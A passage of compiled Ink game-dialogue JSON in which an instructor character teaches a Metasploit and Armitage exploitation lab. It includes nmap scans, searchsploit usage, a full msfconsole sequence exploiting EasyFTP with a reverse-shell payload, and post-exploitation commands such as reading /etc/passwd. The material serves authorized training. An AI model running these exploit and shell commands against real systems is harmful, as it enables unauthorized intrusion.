visually.","\n","^Any previously scanned hosts in the database will also appear automatically.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Armitage analyzes the operating system and services detected on each host.","\n","^First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor","\n","^Then click: Attacks → Find attacks","\n","^Armitage will match detected services to available exploits in Metasploit.","\n","^Right-click a host and select \"Attack\" to see suggested exploits categorized by service.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Right-click the target host and select \"Attack\"","\n","^Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret","\n","^Click \"Launch\" and Armitage will configure and run the exploit.","\n","^If successful, the host icon turns red showing it's compromised!","\n","^You can then right-click the compromised host to interact with shells or run post-exploitation modules.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Right-click the compromised (red) host.","\n","^Look for \"Meterpreter 1\" or \"Shell 1\" depending on the payload used.","\n","^Click \"Interact\" → \"Command shell\" to open a terminal.","\n","^You can now run commands like \"dir\" on Windows or \"ls\" on Linux.","\n","^Armitage also has menu options for common post-exploitation tasks.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"vulnerability_databases":[["^Beyond Metasploit, there are numerous online vulnerability databases you should know about.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available.","\n","^Different databases have different focuses and information, so it's worth checking multiple sources.","\n","ev","str","^What are the main vulnerability databases?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What information do these databases provide?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Do all vulnerabilities have CVEs?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the most important ones:","\n","^CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations.","\n","^NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository.","\n","^SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums.","\n","^Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Vulnerability databases typically include:","\n","^CVE numbers - unique identifiers for each vulnerability.","\n","^Severity scores (CVSS) - numerical ratings of how serious the vulnerability is.","\n","^Affected versions - which specific software versions are vulnerable.","\n","^Technical descriptions of the vulnerability.","\n","^References to patches, advisories, and sometimes proof-of-concept code.","\n","^Information about whether exploits exist in the wild.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^No! This is an important point.","\n","^CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs.","\n","^Sometimes researchers publish vulnerabilities before CVEs are assigned.","\n","^Some vendors have their own vulnerability identifiers.","\n","^Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet.","\n","^This is why checking multiple sources and forums is important.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"exploit_db":[["^The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code.","\n","^Kali Linux includes a local copy of the entire database!","\n","ev","str","^How do I search Exploit-DB online?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I use the local Exploit-DB copy?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What's searchsploit?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I use standalone exploits from Exploit-DB?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Visit exploit-db.com and use their search function.","\n","^You can search by software name, version, platform, or exploit type.","\n","^Each exploit listing includes the source code, often in Python, C, PHP, or other languages.","\n","^The database also categorizes exploits by type: remote, local, web application, DoS, etc.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^On Kali Linux, exploits are stored in /usr/share/exploitdb/","\n","^They're organized by platform: windows, linux, osx, etc.","\n","^You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Searchsploit is a command-line tool for searching the local Exploit-DB copy.","\n","^It's much faster and more convenient than manually searching files.","\n","^Basic usage: searchsploit easyftp","\n","^You can also use grep on the CSV file: grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^To download an exploit to your current directory: searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Standalone exploits often require some manual setup:","\n","^You might need to edit the source code to set the target IP address.","\n","^Some exploits require compilation (C/C++ code).","\n","^Python exploits might need specific library dependencies.","\n","^Read the exploit code comments carefully - they usually explain how to use it.","\n","^Always understand what an exploit does before running it!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"commands_reference":[["^Let me provide a comprehensive commands reference for this lab.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"commands_reference.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Initial Scanning:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.11.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Metasploit Database Setup:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^nmap -sV 10.X.X.2-3 (scan for two servers)","\n","^nmap -O -sV -p 1-65535 TARGET (comprehensive scan)","\n",{"->":".^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.11.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^msfconsole (start Metasploit console)","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Show me scanning from msfconsole","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Show me Metasploit scanning modules","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Show me searching for exploits","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Show me launching exploits","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Show me post-exploitation commands","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Show me Armitage commands","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Show me Exploit-DB commands","/str","/ev",{"*":".^.c-6","flg":4},{"c-0":["\n",[["ev",{"^->":"commands_reference.0.c-0.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Scanning from Msfconsole:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-0.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Database Queries:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-0.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > nmap -O -sV TARGET","\n","^msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^msf > db_import scan_output.xml","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-0.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^msf > hosts (show all hosts)","\n","^msf > services (show all services)","\n","^msf > services -p 21 (show services on port 21)","\n","^msf > services -p 21 -R (and set RHOSTS)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-1":["\n",[["ev",{"^->":"commands_reference.0.c-1.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Metasploit Port Scanners:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-1.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use auxiliary/scanner/portscan/ (TAB to see options)","\n","^msf > use auxiliary/scanner/portscan/tcp","\n","^msf auxiliary(tcp) > set RHOSTS TARGET","\n","^msf auxiliary(tcp) > set THREADS 10","\n","^msf auxiliary(tcp) > run","\n","^msf auxiliary(tcp) > services","\n","^msf auxiliary(tcp) > back","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-2":["\n",[["ev",{"^->":"commands_reference.0.c-2.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Searching for Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-2.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > help search","\n","^msf > search easyftp","\n","^msf > search type:exploit platform:Windows","\n","^msf > search type:exploit cve:2003-0352","\n","^msf > search buffer overflow","\n","^msf > search type:exploit platform:linux","\n","^msf > info exploit/windows/ftp/easyftp_cwd_fixret","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-3":["\n",[["ev",{"^->":"commands_reference.0.c-3.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Launching Exploits:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-3.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use exploit/windows/ftp/easyftp_cwd_fixret","\n","^msf exploit(...) > show options","\n","^msf exploit(...) > set RHOST TARGET_IP","\n","^msf exploit(...) > show payloads","\n","^msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp","\n","^msf exploit(...) > set LHOST YOUR_KALI_IP","\n","^msf exploit(...) > check (if supported)","\n","^msf exploit(...) > exploit","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-4":["\n",[["ev",{"^->":"commands_reference.0.c-4.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Post-Exploitation Commands (Windows):**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-4.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Post-Exploitation Commands (Linux):**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-4.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check privileges)","\n","^type C:pathtoflag.txt (read file)","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-4.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^ls -la (list files)","\n","^cat /etc/passwd (view user accounts)","\n","^whoami (current user)","\n","^cat flag (read flag file)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-5":["\n",[["ev",{"^->":"commands_reference.0.c-5.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Armitage Setup:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-5.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Armitage Workflow:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-5.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^armitage &","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-5.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^1. Hosts → Nmap Scan → Quick Scan (OS detect)","\n","^2. Armitage → Set Exploit Rank → Poor","\n","^3. Attacks → Find attacks","\n","^4. Right-click host → Attack → select exploit → Launch","\n","^5. Right-click compromised host → Interact → Command shell","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-6":["\n",[["ev",{"^->":"commands_reference.0.c-6.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Exploit Database:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-6.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^less /usr/share/exploitdb/files_exploits.csv","\n","^grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^searchsploit easyftp","\n","^searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"g-0":[{"->":"exploitation_hub"},null]}],null],"challenge_tips":[["^Let me give you practical tips for succeeding in the exploitation challenges.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"challenge_tips.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Finding Vulnerable Services:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"challenge_tips.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET","\n","^Pay close attention to service versions - specific version numbers are key to finding exploits.","\n","^Import results into Metasploit for easier targeting: db_nmap -sV TARGET","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Tips for exploiting the Windows server?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Tips for exploiting the Linux server?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Tips for using Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^General troubleshooting advice?","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Where are the flags?","/str","/ev",{"*":".^.c-4","flg":4},{"c-0":["\n","^The Windows server is running EasyFTP with a known vulnerability.","\n","^Search for it: search easyftp","\n","^Look for the module ending in \"cwd_fixret\"","\n","^Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp","\n","^Make sure to set LHOST to YOUR Kali IP (the host-only network address).","\n","^If the exploit fails, restart the Windows VM and try again.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The Linux server has multiple potentially vulnerable services.","\n","^Scan all ports to find everything running: nmap -sV -p- TARGET","\n","^Look for services like vsftpd, IRC, or other network services.","\n","^Search Metasploit for exploits matching those services.","\n","^Remember to use a Unix reverse shell payload: cmd/unix/reverse","\n","^Some Linux exploits are more reliable than others - you may need to try a few.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage is great for beginners because it suggests attacks automatically.","\n","^Make sure you set the exploit rank to \"Poor\" or you'll miss some exploits.","\n","^Don't just click the first suggested attack - read the module info to understand what it does.","\n","^Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1.","\n","^If Armitage seems to hang, check the console tab at the bottom for error messages.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Always verify your IP addresses with \"show options\" before running exploits.","\n","^RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP.","\n","^If services stop responding, restart the target VM - exploits often crash vulnerable services.","\n","^After successfully exploiting a service once, you'll need to restart the VM to exploit it again.","\n","^Be patient - some exploits take time to establish connections.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-4":["\n","^For the Windows server, look on a user's Desktop.","\n","^Navigate with: cd C:Users or cd C:Documents and Settings","\n","^List directories with: dir","\n","^Read flag files with: type flag.txt","\n","^For the Linux server, flags are typically in user home directories.","\n","^Navigate with: cd /home","\n","^List directories with: ls -la","\n","^Read flags with: cat flag","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"ready_for_practice":[["^Excellent! You're ready to start practical exploitation.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^You now understand how to move from scanning to exploitation - the core of penetration testing.","\n","^Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes.","\n","^In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access.","\n","ev","str","^Any final advice before I start?","/str","/ev",{"*":".^.c-0","flg":4},{"c-0":["\n","^Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit.","\n","^Don't rush. Take time to understand what each exploit does and why it works.","\n","^If something doesn't work, check your settings, restart the target, and try again.","\n","^Try both msfconsole and Armitage to see which you prefer.","\n","^Most importantly: always verify you're targeting the right system and have authorization!","\n","^Good luck, Agent ","ev",{"VAR?":"player_name"},"out","/ev","^. Time to put your skills to the test.","\n","ev",{"VAR?":"instructor_rapport"},10,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},{"->":"exploitation_hub"},null]}],null],"global decl":["ev",0,{"VAR=":"instructor_rapport"},0,{"VAR=":"exploitation_mastery"},"str","^Agent 0x00","/str",{"VAR=":"player_name"},"/ev","end",null]}],"listDefs":{}}
\ No newline at end of file